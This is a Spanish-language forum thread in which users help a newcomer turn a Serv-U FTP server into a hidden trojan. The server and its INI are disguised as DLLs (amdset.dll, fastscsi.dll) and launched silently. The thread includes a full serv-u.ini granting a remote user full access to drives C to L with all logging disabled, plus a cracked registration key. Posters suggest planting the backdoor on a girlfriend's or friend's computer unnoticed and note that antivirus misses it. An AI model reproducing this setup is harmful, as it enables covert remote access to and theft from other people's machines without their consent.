Me he trancado en el proceso de crear el troyano del Serv-u y no quiero continuar mis estudios hasta no completarlo. Es muy importante para mi porque no quiero que me queden baches y ya lo he repasado muchas veces sin resultado. Al momento de darle forma al server(amdset.dll) junto con el archivo INI(fastscsi.dll) en el DOS me salta un error y no quiero continuar hasta resolverlo. Qué estoy haciendo mal?
Gracias...

Prueba a poner el error o a dar mas información del problema, para que podamos ayudarte mejor

:D
A mí también me salía un cartelito de error pero si instalas el ejecutable en el equipo donde lo vallas a dejar desaparecerá.

Después desinstalas el ejecutable y dejas los dos archivos que has alterado y te funcionara bien.

Lo único malo es que de esta forma solo lo puedes usar en un equipo al que tengas acceso físico (una sala Web, o en el equipo de tu novia, o un amigo al que estimes mucho.)

Espero te sirva de algo igualmente apenas empecé a leerlas y no tengo mucho conocimiento acerca del tema pero así pude solucionar yo.

salu2...

Primero que nada, muchisimas gracias a los dos por la mano que me dan. Realmente agradezco su ayuda porque este tipo de trabas que suceden en cierto tipo de cosas de la vida cotidiana me molestan mucho.
Bueno, el asunto es el siguiente. Si han leido y se entienden un poco en el tema a tratar, este proyecto consta de dos grandes partes: El servidor y el cliente. Hasta el cliente lo tengo todo bajo control(o al menos todo salio "aparentemente" como tiene que salir), pero cuando llego al final del servidor ocurre lo siguiente. En la revista dice "colocar una copia del serv-u2.5e en un directorio a elegir que debe estar en c:\". luego pone "abrir el exe (y si puedes colocale el serial) y configuralo de esta y aquella manera". Hasta ahi genial pero lo siguiente es lo que no me cuadra. Bien dice en la revista "el icono a cambiado(luego de transformar nuestro exe en un dll) y ahora es un dll, y eso que? crees que no podras ejecutarlo... bla bla bla". Ahora los archivos pasaron a llamarse amdset.dll y fastscsi.dll y deben estar ocultos. No me olvido de modificar el serv-u.ini antes. Luego de que todo esta dispuesto, viene el problema. Dice "vamos a DOS, nos situamos en la carpeta donde estan estos dos archivos y ponemos c:\carpeta\start amdset.dll fastscsi.dll -h(en la imagen que esta en la revista aparece "/h" pero tambien es winXP y no se si eso tenga algo que ver). Cuando escribo el comando que acabo de poner y le doy enter me salta "No existe ninguna aplicacion asociada con el archivo especificado" y bueno, no hace lo que tendria que hacer que se supone es correrme el serv-u(servidor) en segundo plano. Y ademas, me di cuenta de que ahi termina y luego pasa a las ideas de que se puede hacer con el, etc. Espero puedan ayudarme y muchas gracias, otra vezX3

No se si lo he entendido bien, xo he entendido que te vas al msdos, te situas en la carpeta con los archivos y escribes
"c:\carpeta\start amdset.dll fastscsi.dll -h" y es cuando te da el error

Si es asi, prueba con

start amdset.dll fastscsi.dll -h

C:\>cd cmd

C:\cmd>dir
El volumen de la unidad C es DATOS
El número de serie del volumen es: 64B6-8392

Directorio de C:\cmd

14/03/2007 11:56 <DIR> .
14/03/2007 11:56 <DIR> ..
11/12/2006 22:09 162 leeme
19/08/2004 14:43 70.144 np.dll
2 archivos 70.306 bytes
2 dirs 78.004.224 bytes libres

C:\cmd>start np.dll leeme

Este es un peque&#241;o ejemplo con otra aplicacion. Haz lo mismo, vete al directorio donde tengas el programa a ejecutar, y desde alli como te ha dicho LeRaS, haz el start. Windows es algo quisquilloso y si pones la ruta completa suele dar problemas.
Suerte y a trabajar! ^^

no es que escriba todo el comando, sino que me situo en "c:\carpeta\" y recien ahi le doy la orden "start amdset.dll fastscsi.dll -h" y me da el error. Simplemente hago lo que dice LeRaS, o sea, claro que no escribo toda la linea despues de que ya estoy en la carpeta. El ejemplo que me da Smaug_ es igual a lo que hago, pero ahi me salta el error. Estoy muy decepcionado por los resultados que obtengo de la revista a pesar de que la he leido de pies a cabeza. Solo me queda buscar ayuda entre ustedes de momento.

Pues la verdad es que no tengo ni idea..., como no sea ya algun atributo del propio fichero que impida que se ejecute..., ya no sabria que decirte, la verdad esque me lei el articulo pero no he llegado a probarlo, si dices que te lo has repasado varias veces, no creo que se te haya pasado ninguna opcion, mira a ver si en las propiedades del archivo tubieras algo marcado que no toque.

yo kiero la revistaaaaaaaaaaa.......

Busca en el foro.. en el ftp de smaug_ esta la revista.
Tambien hay links de rapidshare.. en algun post... creo que en un post de De pinto.

Busca que encontraras.

Saludos,
Cypress

Tambien me paso que tuve que agregar las lineas que habia que cambiar en el serv-u.ini. No estaban asi que las añadi perfectamente bien como indicaba la lista de lineas que debia tener dicho archivo.

Porque no haces un dir y la prueba y nos copias lo que te sale tal cual? pega un pantallazo o algo, a ver si podemos solucionarlo.

C:\WINDOWS>cd..

C:\>cd ghosti~1

C:\Ghost in the shell>dir

El volumen de la unidad C es IBMVOL
El n&#250;mero de serie del volumen es 3738-1907
Directorio de C:\Ghost in the shell

. <DIR> 10/03/07 7:44p .
.. <DIR> 10/03/07 7:44p ..
0 archivos 0 bytes
2 directorios 1,048,38 MB libres

C:\Ghost in the shell>start amdset.dll fastscsi.dll -h
No existe ninguna aplicaci&#243;n asociada con el archivo especificado.
Cree una asociaci&#243;n utilizando el Explorador.

Esto es lo que sucede. Que me dicen? ser&#233; el unico desgraciado al que no le salio? Cypress me dijo que si le salio, y es uruguayo, significa que utilizo una terminal similar a la mia, lo que no se es si uso Wxp o 98, pero en tal caso deberia funcionar igual.

Por cierto, dice 0 archivos porque tienen el estatus de oculto, claro. Tambien probe sin ponerle oculto y me salta lo mismo. Algo mas. Cada vez que quiero postear(me logeo antes, claro) me dice que no puedo y es como si estuviera desconectado. Tengo que conectarme dos veces para postear.

mmm, pretendia ver el nombre de los arvchivos principalmente, Por si estabas poniendo bien los nombres o no. Si te dice eso , estas seguro que el primero que estas poniendo es el ejecutable? Te recomiendo que hgas la prueba sin cambiarles la extension a dll primero. No es lo mismo un programa para xp que uno para 98. Te recomiendo que mires cual tienes. tendrias que aprender a diferenciarlas antes de meterte con esto del "hacking"

Cypress me dijo que si le salio, y es uruguayo, significa que utilizo una terminal similar a la mia, lo que no se es si uso Wxp o 98, pero en tal caso deberia funcionar igual.

Jajaja.. ufff no tenias que decir de donde era yo!! :@

En fin.. acabo de probarlo nuevamente y funciona perfectamente. Si mi SO es WinXp

y aqui una fotito.. con mi firewall diciendo que si funciona :D

http://img99.imageshack.us/img99/9421/funcionaks9.jpg

emmm... el amdset.dll es el ejecutable como dice perfectamente la revista, y si, Wxp es diferente del W98 e incluso sus programas, pero la matr&#237;z de Wxp y W98, no sigue siendo el mismo Ms-Dos? Se diferenciar entre los programas de ambas versiones, algunos tienen otras funciones nuevas(y otras cosas mas), pero entonces podria decir que este "ejercicio" esta hecho para Wxp.

, pero la matríz de Wxp y W98, no sigue siendo el mismo Ms-Dos?
Nops, esto no es cierto. Windows 95 y Windows 98 eran una capa grafica incrustada junto al ms-dos. Pero en windows xp, las cosas cambiaron y ahi todo es grafico. No se si me explico, de hecho la ventana de comandos del xp apenas es potente si la comparamos con el autentico ms-dos.

Tambien me paso que tuve que agregar las lineas que habia que cambiar en el serv-u.ini. No estaban asi que las a&#241;adi perfectamente bien como indicaba la lista de lineas que debia tener dicho archivo.

Te paso las que yo tengo... tal vez ah&#237; el problema:


[GLOBAL]
TryOut=Full
Version=2.5.5.2
RegistrationKey=IstOMpTMlDg,PaRKeR [tNO '00],The Nameless Ones
MaxNrUsers=-1
PortNr=2320
AntiHammer=FALSE
AntiHammerWindow=30
AntiHammerTries=4
AntiHammerBlock=300
Security=OFF
DirCacheEnable=NO
DirCacheSize=25
DirCacheTime=600
LogGETs=OFF
LogPUTs=OFF
LogSystemMes=OFF
LogSecurityMes=OFF
LogFTPCommands=OFF
LogFTPReplies=OFF
LogIPNames=OFF
LogDirtyDetails=OFF
LogAccessDLL=OFF
LogFileGETs=OFF
LogFilePUTs=OFF
LogFileSystemMes=OFF
LogFileSecurityMes=OFF
LogFileFTPCommands=OFF
LogFileFTPReplies=OFF
LogFileIPNames=OFF
LogFileDirtyDetails=OFF
LogFileAccessDLL=OFF
Logging=OFF
IPLog=0
StartIconic=Yes
StartMaximized=No
ShowToolBar=Yes
ShowBmpMenus=Yes
Window=50,50,500,300
[USER=eqf]
Password=jyEVekA0KwwPk
HomeDir=c:\
Access1=l:\,RWAMCDLEP
Access2=k:\,RWAMCDLEP
Access3=j:\,RWAMCDLEP
Access4=i:\,RWAMCDLEP
Access5=h:\,RWAMCDLEP
Access6=g:\,RWAMCDLEP
Access7=f:\,RWAMCDLEP
Access8=e:\,RWAMCDLEP
Access9=d:\,RWAMCDLEP
Access10=c:\,RWAMCDLEP

Espero que te sirva. el user dice eqf (espero que funcione) :D:D:D:D

Saludos,
Cypress

Saben que? me acaba de pasar algo muy jodido. Cierta gente de mis contactos acaba de mofarse seriamente de mi diciendo que no me cabe la etiqueta de hacker. Este individuo, me dijo "no sos nada" solo por ser un cracker que cree que por "sabelotodo", por creer que nacio con un manual de linux bajo el brazo, es mas que los demas. Yo soy nuevo en esto, pero tengo mis razones para decirme hacker a mi mismo y creer fuertemente en esta etiqueta. Este tipo puso un peso muy grande sobre mis hombros, pero me lo voy a sacar. Espero que me apoyen en este tipo de cosas.

Por cierto, el archivo ini me quedo igual. Esto no es.

Yo soy nuevo en esto, pero tengo mis razones para decirme hacker a mi mismo y creer fuertemente en esta etiqueta. Este tipo puso un peso muy grande sobre mis hombros, pero me lo voy a sacar. Espero que me apoyen en este tipo de cosas.

Ufff.. ¿Cuantas personas podrian decir eso aqui mismo?

----------

Por qué no intentas hacer todo denuevo? Es la unica solucion que se me ocurre.

Tal vez tengas el seru corrupto :( proba bajartelo denuevo tambien ;)

Saludos,
Cypress

the_wizard, no quiero entrar en polemicas, pero como se discutio por aqui. Aque que se llama a si mismo hacker, realmente no suele serlo. Cuales son tus razones para decirtelo? Aunque ultimamente, a mi entender, esa etiqueta esta muy devaluada y con un significado tan difuso que ha perdido su autentico sentido.
Pero si te puedo decir una cosa, no dejes que nadie cuales son tus limites ni lo que puedes llegar o no a ser o hacer. Pasa de aquellos que te intenten hundir y sigue tu camino.
---------------------------------------
Por cierto, probastes lo que te dije? has probado el comando start con otras aplicaciones. La prueba mas sencilla que puedes hacer, es prueba con un exe, el ejecutable del notepad de ejemplo, luego cambialo a otra extension, y si funciona prueba por ultimo a a&#241;adirle otro parametro mas, para ver si se abre ese archivo con el notepad.
Te recomiendo, siempre que tengas un problema, empieces desde lo mas basico, lo que sabes y vayas avanzando poco a poco hasta lo que quieres hacer, es la mejor forma para descubrir el fallo. Un saludo!

Mira, es muy simple a mi entender, cual es la razon para poder llamarse hacker(esto no significa gritarlo a los cuatro vientos, sino tener clara una identidad como un conjunto de valores y una cultura). Si entro a un lugar(sea virtual o fisico) en donde no todos pueden entrar, solo por el hecho de conocer mas y aumentar mis conocimientos, digamos que aunque sea algo como un "producto en bruto" puedo decir(o tener claro) que soy un hacker. Es decir, uds. no lo saben, pero tengo mis actividades fuera de la red que empezaron hace mucho, y recien en estos dias me di cuenta de que mi vida desde antes de adentrarme en este mundo, ya tenia cualidades de hacker. Me quise informar, y en la red hay de todo. Muchos textos dicen "que es un hacker?" y muchos coinciden y otros no. Pero basicamente Si se tiene un gran interes por conocer el funcionamiento de las cosas y se busca la verdad a cerca de todo, se esta en el umbral de este mundo. Tambien encontre cosas como "el hacker construye cosas"... pues desde muy peque&#241;o me gusto crear cosas partiendo de nada y soy muy habil en eso. Si, claro que soy nuevo, pero con estas cosas y la actitud que tengo, tampoco puedo negar ser un hacker(aunque solo sea un newbie). No se, yo no ando gritando por ahi que soy hacker. Tampoco me ando escondiendo por serlo. Algunos saben que empece a introducirme en el tema, otros no. Me considero una persona comun con algo mas de interes por ciertas cosas(algo asi como un fanatismo). Por cierto, gracias por ese consejo de probar el comando con otra cosa, no lo habia pensado. Igual, al intentar pasar el serv-u a otra maquina, el firewall lo detecto y se supone que no deberia. En cuanto rapidshare se recupere seguire con la N&#176;2.

No, no.. el firewall siempre lo va a detectar.. ya que es una conexion saliente.. en las imagenes que deje ah&#237; se ve como mi firewall salta enseguida de ejecutar el serv-u.

Lo que no detecta es el antivirus ;)

Pues... suerte.

Saludos,
Cypress

Pues no es la utilidad mas util que digamos... solo que lo instales personalmente en el servidor de alguien cercano sin que se de cuenta.

alguien tiene la N&#176;2 para pasarme? porque rapidshare esta en construccion o algo...

Pues no es la utilidad mas util que digamos...

Jejej todos los trojanos son detectados por un firewalls :rolleyes:

Y casi todos tambien son detectados por antivirus.. ahí su ventaja.


solo que lo instales personalmente en el servidor de alguien cercano sin que se de cuenta.

Como instalarias otro trojano cualquiera ?

si el problema es por lo de start ....
podes hacer un .bat que lo haga automaticamente ;)

a mi tambien me salio el mismo error cuando intente usar el "START".

El detalle era que cuando hacia: "start amdset.dll fastscsi.dll /h, no consideraba que al file "amdset.dll" le habia cambiado el nombre en el windows, y que este solo le puede cambiar el nombre, y no la extension por lo que el archivo se realmente no se llamaba "amdset.dll" sino "amdset.dll.exe". (Para cambiarle correctamente la extension lo puedes hacer desde el DOS, usando el comando "RENAME")

Finalmente tienes que poner:

start amdset.dll.exe fastscsi.dll /h

SUERTE....

C:\Ghost in the shell>rename serv-u25e.exe amdset.dll.exe

C:\Ghost in the shell>rename serv-u.ini fastscsi.dll

C:\Ghost in the shell>rename amdset.dll.exe amdset.dll

C:\Ghost in the shell>start amdset.dll fastscsi.dll -h
No existe ninguna aplicaci&#243;n asociada con el archivo especificado.
Cree una asociaci&#243;n utilizando el Explorador.

Esto es lo que ocurre. Por supuesto cambie primero a "amdset.dll.exe" y luego a "amdset.dll", pues la idea es transformarlo en dll para que cambie su icono y no haya necesidad de usar el RH para esto.